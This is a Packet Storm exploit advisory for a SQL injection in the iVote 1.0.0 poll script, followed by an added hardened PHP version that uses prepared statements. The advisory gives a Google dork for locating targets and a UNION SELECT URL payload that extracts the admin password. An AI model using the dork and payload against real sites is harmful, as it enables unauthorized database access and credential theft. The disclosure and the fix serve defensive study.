iVote 1.0.0 SQL Injection

2013-07-10T00:00:00
ID PACKETSTORM:122352
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-07-10T00:00:00

Description

`# Exploit Title: iVote SQL Injection  
# Google Dork: inurl:details.php?id=  
# Date: 2013 July 11  
# Exploit Author: Ashiyane Digital Security Team  
# Software Link:  
http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/  
# Version: 1.0.0  
# Tested on: Linux CentOS, Linux Ubuntu, Windows 8  
  
Vulnerability: details.php, line 5. The id GET parameter is placed unquoted and unvalidated into two SQL queries:  
  
$id = $_GET['id'];  
  
$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");  
  
$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");  
  
$row = mysql_fetch_array($select);  
  
///////////////////////////////////////  
  
Example : http://example.com/iVote/details.php?id=1 union select  
1,password,3,4 from settings  
  
  
///////////////////////  
TNX : Rz04 & Crypt0  
I Love Iran & all IRanian Black Hats :X  
  
I'm , Bi Edea (R3za)  
Email : momtane666@yahoo.com  
Gmail : kafaran.blackhats@Gmail.com  
`
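
Hardened form of the details.php lookup shown above, as an added example that is not part of the original advisory or the iVote code base. It validates id as a positive integer and binds it through PDO prepared statements; the table and column names come from the advisory, while the function names, DSN and credentials are hypothetical.

```php
<?php
// Added example, not iVote's own code. Table/column names (votes.V_Id,
// comments.id) are taken from the advisory; function names, the DSN and
// the credentials are hypothetical placeholders.
declare(strict_types=1);

// Accept only a positive decimal integer; anything else yields null.
function parse_vote_id($raw): ?int
{
    if (!is_string($raw)) {          // missing value or array input such as ?id[]=1
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Run both lookups with the id bound as an integer parameter, never concatenated.
function load_vote_details(PDO $db, int $id): ?array
{
    $vote = $db->prepare('SELECT * FROM votes WHERE V_Id = :id');
    $vote->bindValue(':id', $id, PDO::PARAM_INT);
    $vote->execute();
    $row = $vote->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;                 // no such vote
    }
    $comments = $db->prepare('SELECT * FROM comments WHERE id = :id');
    $comments->bindValue(':id', $id, PDO::PARAM_INT);
    $comments->execute();
    return ['vote' => $row, 'comments' => $comments->fetchAll(PDO::FETCH_ASSOC)];
}

$id = parse_vote_id($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);         // a value like "1 union select ..." is rejected here
    exit('Invalid id');
}
// Placeholder connection settings; native prepares keep data out of the SQL text.
$db = new PDO('mysql:host=localhost;dbname=ivote;charset=utf8mb4', 'ivote_user', 'CHANGE_ME', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$details = load_vote_details($db, $id);
if ($details === null) {
    http_response_code(404);
    exit('Not found');
}
```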